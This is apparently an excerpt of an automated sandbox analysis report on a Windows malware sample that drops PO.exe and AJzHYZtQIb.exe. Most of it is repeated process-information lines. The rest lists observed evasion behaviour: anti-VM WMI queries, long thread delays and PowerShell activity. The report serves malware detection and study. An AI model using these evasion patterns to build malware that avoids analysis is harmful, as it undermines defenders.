Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 29A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 8DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 9DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 9FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: AFE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 2F70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 3180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 2FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory allocated: 2CC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory allocated: 2F60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory allocated: 2CC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory allocated: 8F00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory allocated: 78A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory allocated: 8F00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory allocated: 10D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory allocated: 2FA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory allocated: 2DF0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6787	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1105	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8020	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1006	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Window / User API: threadDelayed 1705	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Window / User API: threadDelayed 4241	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Window / User API: threadDelayed 1893
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Window / User API: threadDelayed 6517

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 7592	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8036	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8060	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 7832	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 3292	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 8136	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe TID: 4996	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe TID: 8060	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe TID: 7060	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe TID: 7900	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_00174D8A __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00174D8A
